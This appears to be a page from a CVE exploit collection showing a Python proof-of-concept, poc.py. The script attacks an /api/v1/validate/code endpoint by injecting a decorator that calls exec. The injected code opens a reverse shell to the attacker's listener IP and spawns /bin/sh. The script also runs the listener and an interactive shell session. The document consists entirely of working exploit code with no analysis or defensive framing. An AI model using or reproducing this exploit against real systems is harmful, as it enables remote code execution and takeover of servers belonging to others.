4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
import argparse
import requests
import socket
import threading
import time
import select
import sys

def check_vulnerable(ip, port):
    url = f"http://{ip}:{port}/api/v1/validate/code"
    try:
        r = requests.head(url, timeout=5)
        return r.status_code == 200
    except:
        return False

def send_payload(ip, port, listener_ip, listener_port):
    url = f"http://{ip}:{port}/api/v1/validate/code"
    headers = {"Content-Type": "application/json"}
    payload_code = (
        f'@exec("import socket,os,pty;'
        f's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
        f's.connect((\\\"{listener_ip}\\\",{listener_port}));'
        f'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);'
        f'pty.spawn(\\\"/bin/sh\\\")")\n'
        f'def foo():\n pass'
    )
    data = {"code": payload_code}
    try:
        requests.post(url, json=data, headers=headers, timeout=5)
    except:
        pass

def handle_shell(client_socket):
    try:
        while True:
            read_ready, _, _ = select.select([client_socket, sys.stdin], [], [])
            for sock in read_ready:
                if sock == client_socket:
                    data = client_socket.recv(4096)
                    if not data:
                        print("\n[*] Connection closed by target.")
                        return
                    print(data.decode(errors="ignore"), end='', flush=True)
                else:
                    cmd = input()
                    if cmd.strip().lower() == "exit":
                        print("[*] Exiting shell.")
                        return
                    client_socket.sendall(cmd.encode() + b"\n")
    except KeyboardInterrupt:
        print("\n[!] Exiting shell.")
    finally:
        client_socket.close()

def start_listener(ip, port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        server.bind((ip, port))
        server.listen(1)
        print(f"[+] Listening on {ip}:{port}")
        client, addr = server.accept()
        print(f"[+] Connection from {addr[0]}:{addr[1]}")
        handle_shell(client)
    except KeyboardInterrupt:
        print("\n[!] Listener interrupted.")
    finally:
        server.close()

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", required=True, help="Target IP")
    parser.add_argument("-p", required=True, type=int, help="Target port")
    parser.add_argument("-l", required=True, help="Your listener IP")
    parser.add_argument("-lp", required=True, type=int, help="Your listener port")
    args = parser.parse_args()

    if not check_vulnerable(args.i, args.p):
        print("[-] Doesn't look vulnerable")
        return

    print(f"[+] Vulnerability detected at http://{args.i}:{args.p}/api/v1/validate/code")

    listener_thread = threading.Thread(target=start_listener, args=(args.l, args.lp))
    listener_thread.start()

    time.sleep(2)

    print(f"[+] Sending payload to http://{args.i}:{args.p}/api/v1/validate/code")
    send_payload(args.i, args.p, args.l, args.lp)

    listener_thread.join()

if __name__ == "__main__":
    main()